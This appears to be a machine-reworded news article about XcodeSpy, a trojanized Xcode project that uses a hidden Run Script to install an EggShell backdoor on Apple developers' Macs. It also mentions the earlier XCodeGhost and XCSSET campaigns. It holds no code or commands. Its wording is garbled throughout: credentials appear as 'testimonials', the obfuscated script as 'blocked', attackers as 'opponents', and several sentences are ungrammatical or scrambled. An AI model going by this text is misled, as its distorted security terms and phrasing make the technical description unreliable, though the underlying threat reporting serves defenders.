Cybersecurity investigators on Thursday unveiled a new attack in which threat actors leverage Xcode as an attack vector to compromise Apple’s back-end platform developers, adding to a growing trend that includes targeting developers and researchers with malicious attacks.
Called “XcodeSpy,” the trojanized Xcode project is a corrupted version of a legitimate open source project available on GitHub called TabBarInteraction used by developers to animate iOS tab bars based on user interaction.
“XcodeSpy is a malicious Xcode project that installs a tailored variant of the EggShell backend on the developer’s macOS computer along with a persistence mechanism,” said SentinelOne researchers.
Xcode is Apple’s integrated development environment (IDE) for macOS, which is used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.
Earlier this year, the Google Threat Analysis group unveiled a campaign in North Korea aimed at security researchers and exploiting developers, which involved sharing a Visual Studio project designed to load malicious DLLs on Windows systems.
The doctored Xcode project is doing something similar, only this time the attacks have identified Apple developers.
Apart from the original code content, XcodeSpy also includes a blocked Run Script that is executed when the developer build target is launched. The script then connects to an attacker-managed server to retrieve a tailored variant of the EggShell backdoor on the development machine, which comes with capabilities to record information from the victim’s microphone, camera, and keyboard.
“XcodeSpy takes advantage of a built-in feature of Apple’s IDE that allows developers to run a customized shell script when launching an example of their target application,” the researchers said. “Although the technique is easily identifiable if viewed, new or inexperienced developers who are not aware of the Run Script feature are at particular risk as there is no indication in the console or debugger to indicate that the malicious script has to achieve it. “
SentinelOne said it identified two variations of the EggShell payload, with the samples uploaded to VirusTotal from Japan on August 5 and October 13 last year. Additional clues refer to one anonymous organization in the United States that is said to have been targeted using this campaign between July and October 2020, with other developers in Asia likely to be targeted as well.
Previously, opponents have turned to corrupt Xcode executors (aka XCodeGhost) to inject malicious code into iOS apps created with the infected Xcode without the developers’ knowledge, and subsequently use the infected apps to collect information from the devices after they are downloaded and installed from the App Store.
Then in August 2020, researchers from Trend Micro uncover a similar threat that spread through modified Xcode projects, which, when built, were configured to install mac malware called XCSSET to steal testimonials, capture screenshots, sensitive data from messaging and note-taking apps, and even encrypting files for ransom.
Like XCSSET, XcodeSpy takes an easier path, as the goal seems to be to hit the developers themselves, though the ultimate objective behind the exploitation and the identity of the group behind it remains be unclear so far.
“Targeting software developers is the first step in a successful supply chain attack. One way to do that is to abuse the exact development tools necessary to carry out this work,” the researchers said.
“XcodeSpy may well be targeted at a particular developer or group of developers, but there are other potential scenarios with such high value victims. Attackers could be trawling for interesting targets and collecting data for campaigns in the future, or they might be trying to collect AppleID testimonials for use in other campaigns that use malicious software with valid Apple Developer code signatures. “